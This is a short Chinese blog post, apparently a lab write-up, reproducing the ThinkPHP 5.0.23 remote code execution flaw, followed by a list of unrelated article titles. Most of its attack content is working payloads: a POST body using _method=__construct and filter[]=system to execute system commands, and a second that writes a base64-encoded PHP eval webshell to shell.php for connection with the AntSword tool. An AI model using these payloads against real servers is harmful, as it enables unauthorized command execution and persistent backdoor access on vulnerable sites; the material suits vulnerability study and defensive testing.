当前位置: 首页 > news >正文

ThinkPHP5 5.0.23-rce远程代码执行漏洞复现

news 2025/6/28 5:08:56

启动环境,先关闭其他环境

启动

判断是否存在漏洞:访问/index.php?s=captcha页面,会出现报错

使用HackBar 插件发送 POST 请求

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=dir 

通过echo命令写入 Webshell 文件并把木马进行base64编码

post发送

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4= | base64 -d > shell.php

 访问shell.php,使用蚁剑连接

http://www.lryc.cn/news/433237.html

相关文章:

  • windows下安装并使用nvm
  • mac m2 安装 nvm
  • 通信工程学习:什么是AN接入网络
  • MSCKF7讲:特征管理与优化
  • C# XML 使用教程
  • 淘宝开放平台交易类API解析以及如何测试?
  • 基于聚类与LSTM对比特币价格深度分析与预测
  • YOLOv9改进策略【Neck】| 使用CARAFE轻量级通用上采样算子
  • SpringMVC上
  • 嵌入式软件--51单片机 DAY 2
  • 高精度加法,减法,乘法,除法
  • 学习计划(大三上)
  • 【第0006页 · 数组】寻找重复数
  • 移情别恋c++ ദ്ദി˶ー̀֊ー́ ) ——10.继承
  • uniapp+vue3实现双通道透明MP4播放支持小程序和h5
  • 汇编:嵌入式软件架构学习资源
  • python编程知识(实现数据加密和解密)
  • 如何使div居中?CSS居中终极指南
  • Redis 篇-深入了解分布式锁 Redisson 原理(可重入原理、可重试原理、主从一致性原理、解决超时锁失效)
  • PostgreSQL中的多版本并发控制(MVCC)深入解析
  • SpringBoot项目-实现简单的CRUD功能和分页查询
  • CCF编程能力等级认证GESP—C++2级—20240907
  • C语言手撕实战代码_二叉排序树(二叉搜索树)_构建_删除_插入操作详解
  • YC教父的创始人模式VS职业经理人模式:AI时代的独立开发者崛起
  • [SUCTF 2019]Pythonginx
  • 省市县相关校验sql随笔
  • uniapp ios sticky定位,内部 u-tabs(包含scroll-view)消失问题
  • web群集--nginx配置文件location匹配符的优先级顺序详解及验证
  • Vivado编译报错黑盒子问题
  • 【建造者模式】